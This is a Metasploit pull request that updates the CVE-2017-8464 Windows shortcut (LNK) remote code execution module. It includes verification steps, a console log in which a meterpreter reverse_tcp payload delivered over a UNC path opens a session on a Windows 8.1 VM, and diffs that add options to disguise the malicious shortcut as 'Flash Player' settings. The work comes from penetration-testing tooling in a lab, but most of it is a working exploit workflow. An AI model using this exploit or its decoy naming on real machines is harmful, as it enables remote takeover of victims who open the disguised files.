### PR TITLE
Update the CVE-2017-8464 module

### PR DESCRIPTION
**Pull request by zeroSteiner**
## Overview
This PR makes some changes to the existing CVE-2017-8464 module to make it a bit more flexible. Instead of forcing the user to place the malicious files in the root of a drive, the user is now allowed to specify a specific path. The old functionality of trying each drive letter will still be used when ``PATH`` is
not set. Additionally a specific drive can be used by setting ``PATH`` to the drive such as ``set PATH E:\\``.

In my testing I was able to get the payload to load over a UNC path on both Windows 10 x64 and Windows 8.1 x64.

## Verification

- [x] Start `msfconsole`
- [x] Start a payload handler for Windows
- [x] Use `exploits/windows/fileformat/cve_2017_8464_lnk_rce`
- [x] Set the PATH to an explicit path of where the `.cpl|.dll` file will be placed
- [x] Update the display name with the advanced `LNK_DISPLAY_NAME` option
- [x] Run `exploit` and copy the files to the path chosen in the previous step on the victim
- [x] Get a session when viewing the `.lnk` file in Explorer
- [x] Verify the the LNK Display Name has been set to what the user specified

## Checking The LNK Display Name
  1. Right click the link, select Properties
  1. Go to the Shortcut tab
  1. The Display Name is shown in the Target Type field

## Example Usage
In this example the `Downloads` directory is shared via Virtual Box to the
target Windows 8.1 x64 VM and is accessible from the UNC path
`\\vboxsrv\Downloads`.

```
Sep30 18:32:48|192.168.254.110|S:0 J:1 exploit(cve_2017_8464_lnk_rce) > show options

Module options (exploit/windows/fileformat/cve_2017_8464_lnk_rce):

   Name      Current Setting                    Required  Description
   ----      ---------------                    --------  -----------
   DLLNAME   FlashPlayerCPLApp.cpl              no        The DLL file containing the payload
   FILENAME  Flash Player.lnk                   no        The LNK file
   PATH      \\vboxsrv\Downloads\cve-2017-8464  no        An explicit path to where the files will be hosted


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.254.110  yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Windows x64


Sep30 18:32:52|192.168.254.110|S:0 J:1 exploit(cve_2017_8464_lnk_rce) > exploit

[*] [2017.09.30-18:32:54] /home/steiner/.msf4/local/FlashPlayerCPLApp.cpl created, copy it to the root folder of the target USB drive
[*] [2017.09.30-18:32:54] Generating LNK file to load: \\vboxsrv\Downloads\cve-2017-8464\FlashPlayerCPLApp.cpl
[*] [2017.09.30-18:32:54] /home/steiner/.msf4/local/FlashPlayer.lnk created, copy to the target paths
Sep30 18:32:54|192.168.254.110|S:0 J:1 exploit(cve_2017_8464_lnk_rce) > cp /home/steiner/.msf4/local/FlashPlayerCPLApp.cpl ~/Downloads/cve-2017-8464
[*] exec: cp /home/steiner/.msf4/local/FlashPlayerCPLApp.cpl ~/Downloads/cve-2017-8464

Sep30 18:32:57|192.168.254.110|S:0 J:1 exploit(cve_2017_8464_lnk_rce) > cp /home/steiner/.msf4/local/FlashPlayer.lnk ~/Downloads/cve-2017-8464
[*] exec: cp /home/steiner/.msf4/local/FlashPlayer.lnk ~/Downloads/cve-2017-8464

Sep30 18:33:08|192.168.254.110|S:0 J:1 exploit(cve_2017_8464_lnk_rce) >
[*] [2017.09.30-18:33:15] Sending stage (205379 bytes) to 192.168.254.110
[*] Meterpreter session 5 opened (192.168.254.110:4444 -> 192.168.254.110:45842) at 2017-09-30 18:33:15 -0400

Sep30 18:33:21|192.168.254.110|S:1 J:1 exploit(cve_2017_8464_lnk_rce) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer        : WINDOWS8VM
OS              : Windows 8.1 (Build 9600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >
```

### CODE REVIEW

File: modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb [hunk 1]
```diff
@@ -17,18 +17,23 @@ def initialize(info = {})
...
+          This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK)
+          that contain a dynamic icon, loaded from a malicious DLL.
 
           This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is
           similar except an additional SpecialFolderDataBlock is included. The folder ID set
           in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass
           the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary
           DLL file.
+
+          If not PATH is specified, the module will use drive letters D through Z so the files
```
Comment (h00die) [inline modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb]: not = no

File: modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb [hunk 2]
```diff
@@ -56,22 +61,24 @@ def initialize(info = {})
...
       ]
     )
 
     register_advanced_options(
       [
-        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true])
+        OptBool.new('DisablePayloadHandler', [false, 'Disable the handler code for the selected payload', true]),
+        OptString.new('LNK_COMMENT', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']),
+        OptString.new('LNK_DISPLAY_NAME', [true, 'The display name to use in the generated LNK file', 'Flash Player'])
       ]
```
Comment (void-in) [inline modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb]: Shouldn't the advanced options be camel style?

**Comment by zeroSteiner** [comment]
Thanks @void-in and @h00die, comments have been addressed!

**Comment by wchen-r7** [comment]
I'll test it out. Thanks!

**Comment by wchen-r7** [comment]
Everything works as expected. I'll land this now. Thank you!

**Comment by wchen-r7** [comment]
# Release Notes

This PR improves the cve_2017_8464_lnk_rce exploit module by making it more reliable. The user can now set an arbitrary path for the payload, as well as other LNK properties such as comment, and the display name.

**Pull request merged**